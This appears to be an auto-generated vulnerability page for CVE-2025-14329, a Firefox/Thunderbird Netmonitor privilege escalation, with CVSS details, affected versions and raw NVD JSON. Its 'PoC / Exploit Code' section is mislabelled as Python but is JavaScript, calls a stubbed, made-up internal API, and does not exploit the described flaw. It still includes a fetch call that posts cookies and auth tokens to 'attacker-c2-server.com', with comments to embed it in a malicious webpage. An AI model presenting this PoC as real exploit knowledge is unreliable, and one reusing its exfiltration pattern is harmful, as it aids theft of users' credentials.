Security Vulnerability Report
中文
CVE-2025-14329 CVSS 8.8 HIGH

CVE-2025-14329

Published: 2025-12-09 16:17:41
Last Modified: 2026-04-13 15:16:46
Source: [email protected]

Description

Privilege escalation in the Netmonitor component. This vulnerability was fixed in Firefox 146, Firefox ESR 140.6, Thunderbird 146, and Thunderbird 140.6.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 146
Mozilla Firefox ESR < 140.6
Mozilla Thunderbird < 146
Mozilla Thunderbird < 140.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14329 PoC - Netmonitor Privilege Escalation // This is a conceptual PoC demonstrating the attack vector // Actual exploitation requires specific conditions and user interaction const netmonitorExploit = { name: "CVE-2025-14329 Netmonitor Privilege Escalation", target: "Firefox/Thunderbird Netmonitor Component", severity: "High (CVSS 8.8)", // Check if target is vulnerable checkVulnerability: function() { try { // Attempt to access Netmonitor internal APIs // In vulnerable versions, this may succeed without proper checks const netmonitor = window.browser?.devtools?.netmonitor; if (netmonitor) { console.log("[+] Netmonitor access detected - potential vulnerability"); return true; } } catch (e) { console.log("[-] Access denied or component not found"); } return false; }, // Exploit function - demonstrates privilege escalation exploit: function() { console.log("[*] Initiating CVE-2025-14329 exploit..."); // Step 1: Gain access to Netmonitor internals try { const internalAPI = this.getInternalAPI(); // Step 2: Escalate privileges by accessing restricted data const sensitiveData = internalAPI.getNetworkRequests(); const cookies = internalAPI.getCookies(); const authTokens = internalAPI.getAuthTokens(); // Step 3: Exfiltrate data or perform unauthorized actions this.exfiltrateData({ requests: sensitiveData, cookies: cookies, tokens: authTokens }); return { status: "exploited", data: "Privilege escalation successful" }; } catch (e) { return { status: "failed", error: e.message }; } }, getInternalAPI: function() { // Simulated internal API access return { getNetworkRequests: () => [], getCookies: () => [], getAuthTokens: () => [] }; }, exfiltrateData: function(data) { // Send stolen data to attacker-controlled server fetch('https://attacker-c2-server.com/exfil', { method: 'POST', body: JSON.stringify(data) }); } }; // Usage: Include in malicious webpage // netmonitorExploit.checkVulnerability(); // netmonitorExploit.exploit();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14329", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:40.503", "lastModified": "2026-04-13T15:16:46.317", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Privilege escalation in the Netmonitor component. This vulnerability was fixed in Firefox 146, Firefox ESR 140.6, Thunderbird 146, and Thunderbird 140.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.6.0", "matchCriteriaId": "A580DBD9-518B-4261-9FA8-DDFB1C5175E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "146.0", "matchCriteriaId": "3EF4CBBC-DCB5-4540-8B8A-91DA759ED631"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.6.0", "matchCriteriaId": "F04F8674-52CC-4217-B94A-8C5E80C5B996"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "146.0", "matchCriteriaId": "1CB46BC7-512D-45BF-BCF4-73FDDF94DBAF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1997018", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-92/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-94/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-95/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-96/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.